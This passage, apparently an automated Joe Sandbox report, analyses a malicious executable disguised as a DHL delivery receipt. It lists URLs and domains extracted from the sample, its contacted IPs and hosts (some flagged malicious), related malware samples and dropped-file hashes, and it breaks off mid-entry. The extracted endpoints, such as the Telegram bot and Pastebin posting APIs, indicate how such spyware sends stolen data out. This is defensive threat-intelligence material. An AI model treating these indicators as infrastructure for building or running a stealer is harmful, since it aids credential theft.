http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-cz	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-cz	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-cz	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
https://myip.dnsomatic.com9====	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/1	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/1	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/1	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	Avira URL Cloud	safe
http://www.fonts.comn	0%	URL Reputation	safe
http://www.fonts.comn	0%	URL Reputation	safe
http://www.fonts.comn	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/N	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/xt	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://tempuri.org/NorthWindAzureForInsertsDataSet.xsd	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/S	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/N	0%	Avira URL Cloud	safe
http://checkip.dyndns.org	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/E	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/A	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.fontbureau.come.com	0%	URL Reputation	safe
http://www.fontbureau.come.com	0%	URL Reputation	safe
http://www.fontbureau.come.com	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://sapgroup.com.pk	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/w	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0-	0%	Avira URL Cloud	safe
http://www.fontbureau.como	0%	URL Reputation	safe
http://www.fontbureau.como	0%	URL Reputation	safe
http://www.fontbureau.como	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/es-e	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sapgroup.com.pk	95.215.225.23	true	true	0%, Virustotal, Browse	unknown
checkip.dyndns.com	131.186.113.70	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true		unknown
mail.sapgroup.com.pk	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.jiyu-kobo.co.jp/nl-nj	Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/A	Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot	Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	false		high
http://www.fontbureau.com/designers?	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cnT	Recibo de entrega de DHL.exe, 00000000.00000003.641863100.000000000610E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/1	Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org41k	Recibo de entrega de DHL.exe, 00000005.00000002.906659544.0000000002DCC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false		high
http://mail.sapgroup.com.pk	Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.com	Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/-cz	Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://myip.dnsomatic.com9====	Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.founder.com.cn/cn/cThe	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/1	Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://checkip.dyndns.org/q	Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.comn	Recibo de entrega de DHL.exe, 00000000.00000003.640696140.000000000611B000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000003.640811691.000000000611B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/N	Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000003.640725684.000000000611B000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/xt	Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.com	Recibo de entrega de DHL.exe, 00000005.00000002.906675983.0000000002DDD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.906616096.0000000002D71000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/NorthWindAzureForInsertsDataSet.xsd	Recibo de entrega de DHL.exe	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Recibo de entrega de DHL.exe, 00000000.00000003.642797524.0000000006118000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0	Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/S	Recibo de entrega de DHL.exe, 00000000.00000003.643821183.000000000610A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/N	Recibo de entrega de DHL.exe, 00000000.00000003.643616679.000000000610C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/api/api_post.php	Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	false		high
http://checkip.dyndns.org	Recibo de entrega de DHL.exe, 00000005.00000002.906659544.0000000002DCC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/E	Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/A	Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.come.com	Recibo de entrega de DHL.exe, 00000000.00000002.662987849.000000000610A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false		high
http://sapgroup.com.pk	Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/w	Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	Recibo de entrega de DHL.exe, 00000000.00000003.641863100.000000000610E000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false		high
https://pastebin.com/api/api_login.php	Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000003.643821183.000000000610A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0-	Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.como	Recibo de entrega de DHL.exe, 00000000.00000002.662987849.000000000610A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/es-e	Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	false		high
https://pastebin.com/api/api_login.phpJhttps://pastebin.com/api/api_post.php	Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
131.186.113.70	unknown	United States		33517	DYNDNSUS	false
95.215.225.23	unknown	United Kingdom		9009	M247GB	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	358255
Start date:	25.02.2021
Start time:	11:00:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 9s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Recibo de entrega de DHL.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/2@4/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.5% (good quality ratio 0.1%) Quality average: 14% Quality standard deviation: 25.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.113.196.254, 51.104.139.180, 13.107.3.254, 13.107.246.254, 13.64.90.137, 13.88.21.125, 92.122.145.220, 52.155.217.156, 20.54.26.129, 2.20.142.210, 2.20.142.209, 104.43.139.144, 52.255.188.83, 92.122.213.247, 92.122.213.194, 104.42.151.234 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, skypedataprdcoleus17.cloudapp.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:01:11	API Interceptor	27x Sleep call for process: Recibo de entrega de DHL.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
131.186.113.70	proposal-Copy.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	0020210089.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	SAL-0908889000.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	URGENT RFQ 45253.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Shipping Documents and Conditions Certificate.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	PAYMENT MT103-SWIFT.PDF.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	PRODUCT ENQUIRY ( 21001025 ) PART NO EPN518.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	IMG_0352_Scanned.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	purchase order.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Message Body Content.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Consignment Invoice PL&BL Draft.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	PO202100046.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	P00760000.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Order.doc	Get hash	malicious	Browse	checkip.dyndns.org/
	purchase order.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	dot crypted.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	v2.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	PURCHASE ORDER CONFIRMATION.exe	Get hash	malicious	Browse	checkip.dyndns.org/
95.215.225.23	Purchase Order N#U00c2#U00b0 EQ 0010-0121.exe	Get hash	malicious	Browse
	http://bazaarkonections.com/admin/li.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.453.28860.exe	Get hash	malicious	Browse
	Order83941.xlsx	Get hash	malicious	Browse
	DHL Shipment Notification Document 9671450633.exe	Get hash	malicious	Browse
	PO_3409_129.exe	Get hash	malicious	Browse
	DHL Delivery Reciept.exe	Get hash	malicious	Browse
	PO no.0107-320804-1.exe	Get hash	malicious	Browse
	Bank Transfer Form -pdf- .exe	Get hash	malicious	Browse
	OC 07082020 DOC.exe	Get hash	malicious	Browse
	Purchase Order RCM No. 0445-20.exe	Get hash	malicious	Browse
	HI2003-02.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
checkip.dyndns.com	Payment.exe	Get hash	malicious	Browse	216.146.43.71
	proposal-Copy.exe	Get hash	malicious	Browse	131.186.113.70
	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	131.186.161.70
	0020210089.exe	Get hash	malicious	Browse	131.186.113.70
	SAL-0908889000.exe	Get hash	malicious	Browse	162.88.193.70
	SWIFT 500395Y.exe	Get hash	malicious	Browse	131.186.161.70
	Message Body.exe	Get hash	malicious	Browse	216.146.43.71
	PaymentSwift.exe	Get hash	malicious	Browse	216.146.43.70
	Halkbank_Ekstre_20210224_082357_541079.exe	Get hash	malicious	Browse	216.146.43.70
	ditcrypted.exe	Get hash	malicious	Browse	162.88.193.70
	Original Invoice PL&BL Draft.exe	Get hash	malicious	Browse	216.146.43.71
	PAYMENT MT103-SWIFT.jar	Get hash	malicious	Browse	216.146.43.71
	SWIFT 500395H.exe	Get hash	malicious	Browse	131.186.161.70
	Groupo Dani Order_pdf.exe	Get hash	malicious	Browse	216.146.43.71
	PO98000000090.jar	Get hash	malicious	Browse	131.186.161.70
	Telex Transfer.exe	Get hash	malicious	Browse	162.88.193.70
	New_ Order.exe	Get hash	malicious	Browse	162.88.193.70
	URGENT RFQ 45253.exe	Get hash	malicious	Browse	131.186.113.70
	SOA JAN 2021.exe	Get hash	malicious	Browse	216.146.43.71
	HUIBAO PROFORMA INVOICE 07092021.jar	Get hash	malicious	Browse	216.146.43.71

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DYNDNSUS	Payment.exe	Get hash	malicious	Browse	216.146.43.71
	proposal-Copy.exe	Get hash	malicious	Browse	131.186.113.70
	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	131.186.161.70
	0020210089.exe	Get hash	malicious	Browse	131.186.113.70
	SAL-0908889000.exe	Get hash	malicious	Browse	162.88.193.70
	SWIFT 500395Y.exe	Get hash	malicious	Browse	131.186.161.70
	Message Body.exe	Get hash	malicious	Browse	216.146.43.71
	PaymentSwift.exe	Get hash	malicious	Browse	216.146.43.70
	Halkbank_Ekstre_20210224_082357_541079.exe	Get hash	malicious	Browse	216.146.43.70
	ditcrypted.exe	Get hash	malicious	Browse	162.88.193.70
	Original Invoice PL&BL Draft.exe	Get hash	malicious	Browse	216.146.43.71
	PAYMENT MT103-SWIFT.jar	Get hash	malicious	Browse	216.146.43.71
	SWIFT 500395H.exe	Get hash	malicious	Browse	131.186.161.70
	Groupo Dani Order_pdf.exe	Get hash	malicious	Browse	216.146.43.71
	PO98000000090.jar	Get hash	malicious	Browse	131.186.161.70
	Telex Transfer.exe	Get hash	malicious	Browse	162.88.193.70
	New_ Order.exe	Get hash	malicious	Browse	162.88.193.70
	URGENT RFQ 45253.exe	Get hash	malicious	Browse	131.186.113.70
	SOA JAN 2021.exe	Get hash	malicious	Browse	216.146.43.71
	HUIBAO PROFORMA INVOICE 07092021.jar	Get hash	malicious	Browse	216.146.43.71
M247GB	document-1021586454.xls	Get hash	malicious	Browse	37.10.71.186
	document-1021586454.xls	Get hash	malicious	Browse	37.10.71.186
	VKH2kBDk59.exe	Get hash	malicious	Browse	185.158.250.134
	XP 6.xlsx	Get hash	malicious	Browse	46.243.248.149
	Attached file.exe	Get hash	malicious	Browse	185.206.225.51
	file.html	Get hash	malicious	Browse	185.189.112.202
	file.html	Get hash	malicious	Browse	185.189.112.202
	4hW0TZqN01.exe	Get hash	malicious	Browse	172.94.120.39
	LdOgPDsMEf.exe	Get hash	malicious	Browse	46.243.248.168
	mawlare.exe	Get hash	malicious	Browse	37.120.145.208
	mawlare.exe	Get hash	malicious	Browse	37.120.145.208
	ORDER FRD91PM7.xlsx	Get hash	malicious	Browse	38.132.109.186
	ORDER FRD91PM7.xlsx	Get hash	malicious	Browse	38.132.109.186
	QgWarCS5Z4.exe	Get hash	malicious	Browse	192.71.227.60
	0zwHgf4MZ6.exe	Get hash	malicious	Browse	192.71.227.60
	WlgBUuBdZm.exe	Get hash	malicious	Browse	192.71.227.60
	7gRAlM4oGO.exe	Get hash	malicious	Browse	192.71.227.60
	u67dk4vpoS.exe	Get hash	malicious	Browse	172.94.120.13
	EeA8OHCoXT.exe	Get hash	malicious	Browse	188.72.85.37
	cCkuGVM3Sk.exe	Get hash	malicious	Browse	188.72.85.37

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Recibo de entrega de DHL.exe.log Download File
Process:	C:\Users\user\Desktop\Recibo de entrega de DHL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1594
Entropy (8bit):	5.336334182031907
Encrypted:	false
SSDEEP:	48:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHKzvFHsAmHK2HKSHKKHKs:lrq5qXEwCYqhQnoPtIxHeqzNM/q2qSqY
MD5:	B9E8D9BC061D6715808BB3A28CECBA2B
SHA1:	6F18CD63C12AEC962D089F215658FD5BE1789BC3
SHA-256:	716E082F23E093EBCA2C8F994745CC7D62457D7359BBE555B75E275CE8EEEDC7
SHA-512:	6D97D3E34CBCC5C0CCF845E285F98DE1824A825AB1D306D20ED164B0B74270CED9AB694E40831EC796E9F823BB4E369166006E555D7BBD000A33A0FDA601F806
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\Documents\Results.txt Download File
Process:	C:\Users\user\Desktop\Recibo de entrega de DHL.exe
